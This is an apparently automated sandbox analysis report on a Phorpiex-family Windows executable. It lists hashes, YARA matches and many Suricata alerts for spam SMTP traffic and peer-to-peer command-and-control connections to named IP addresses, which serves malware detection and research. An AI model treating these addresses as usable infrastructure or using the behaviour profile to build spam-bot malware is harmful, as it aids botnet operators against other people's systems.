Summary | ZeroBOX

newtpp.exe

Tags: Generic Malware, Malicious Library, Downloader, Admin Tool (Sysinternals etc ...), Antivirus, UPX, Malicious Packer, PE File, PE32, PowerShell
Category FILE
Machine s1_win7_x6403_us
Started July 26, 2024, 11:57 a.m.
Completed July 26, 2024, noon
Size 79.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 e2e3268f813a0c5128ff8347cbaa58c8
SHA256 d8b83f78ed905a7948e2e1e371f0f905bcaaabbb314c692fee408a454f8338a3
CRC32 F030B5A5
ssdeep 1536:W9mw4/inFmav82TmKtj+5qUPsY3BCHYJhcWPA4G9kj3K1:CmwohOBiPsWMH4ogj3K
Yara
  • Network_Downloader - File Downloader
  • Malicious_Library_Zero - Malicious_Library
  • Admin_Tool_IN_Zero - Admin Tool Sysinternals
  • PE_Header_Zero - PE File Signature
  • Malicious_Packer_Zero - Malicious Packer
  • IsPE32 - (no description)
  • UPX_Zero - UPX packed file
  • Generic_Malware_Zero - Generic Malware

Name Response Post-Analysis Lookup
IP Address Status Action

Suricata Alerts

Flow SID Signature Category
TCP 185.215.113.66:80 -> 192.168.56.103:49173 2400032 ET DROP Spamhaus DROP Listed Traffic Inbound group 33 Misc Attack
UDP 192.168.56.103:64894 -> 164.124.101.2:53 2054169 ET INFO External IP Lookup Domain in DNS Lookup (icanhazip .com) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49177 -> 104.16.185.241:80 2017398 ET POLICY IP Check Domain (icanhazip. com in HTTP Host) Attempted Information Leak
TCP 192.168.56.103:49193 -> 98.136.96.93:25 2045229 ET MALWARE Win32/Phorpiex Template 9 Active - Outbound Malicious Email Spam Malware Command and Control Activity Detected
TCP 67.195.204.75:25 -> 192.168.56.103:49938 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49641 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49952 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49649 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49648 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49678 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49666 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49690 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49697 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49693 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49700 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49698 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49719 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49725 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49755 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49744 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49761 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49746 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49685 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49748 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49706 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49582 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49583 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49647 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49656 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49667 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49732 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49738 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49798 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49801 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49715 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49809 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49711 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49830 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49727 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49729 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49885 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49752 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49907 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49765 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49767 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49950 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49958 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49951 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49989 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49990 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49995 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50009 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49956 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49969 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50031 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50055 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50057 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50058 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49779 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49784 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49790 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49795 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49815 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49672 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49772 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49754 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49676 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49805 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49839 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49689 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49695 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49850 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49836 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49861 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49699 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49702 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49873 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49710 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49716 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49882 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49745 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49927 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49948 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49762 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49773 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49792 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49803 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49806 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49832 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49972 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49837 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49982 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49872 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50006 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50010 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49902 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50018 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49897 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49917 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49920 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49933 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49935 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49931 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50060 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49949 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50079 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50084 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49962 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50101 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49975 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50108 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49976 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50147 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50169 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49984 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50176 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50184 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50014 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50195 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50205 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50212 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50213 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50020 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50227 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50247 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50252 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50043 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50257 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50053 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50270 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50090 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50093 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50299 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49845 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50306 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50308 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50319 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49847 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49851 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49858 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49863 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49867 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50107 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49865 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:49870 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49888 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50392 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50127 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49900 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49910 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.80:25 -> 192.168.56.103:50389 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
UDP 192.168.56.103:59146 -> 2.185.163.114:40500 2044077 ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC A Network Trojan was detected
UDP 192.168.56.103:59146 -> 95.58.72.245:40500 2044077 ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC A Network Trojan was detected
UDP 192.168.56.103:59146 -> 109.74.35.21:40500 2044077 ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC A Network Trojan was detected
UDP 192.168.56.103:59146 -> 109.74.43.21:40500 2044077 ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC A Network Trojan was detected
UDP 192.168.56.103:59146 -> 194.93.26.210:40500 2044077 ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC A Network Trojan was detected
UDP 192.168.56.103:59146 -> 217.30.160.154:40500 2044077 ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC A Network Trojan was detected
TCP 67.195.204.75:25 -> 192.168.56.103:49940 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49945 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49947 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49967 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49998 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50001 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50012 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50004 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50015 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50016 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50025 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50026 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50030 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
UDP 192.168.56.103:59146 -> 77.221.27.219:40500 2044077 ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC A Network Trojan was detected
TCP 67.195.204.75:25 -> 192.168.56.103:50051 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50089 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50128 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50125 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50139 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50140 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50151 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50165 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50179 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50278 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50292 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50322 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50141 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50210 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50216 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50224 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50293 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50294 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50314 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50325 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50330 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50338 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50339 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50353 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50358 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50364 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50375 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50381 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50410 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50143 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50335 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50146 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50148 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50344 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50159 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50357 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50161 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50359 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50166 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50377 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50378 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50177 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50399 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50180 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50182 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:50183 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50199 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50208 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 67.195.204.75:25 -> 192.168.56.103:50218 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50222 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:50225 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:50230 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
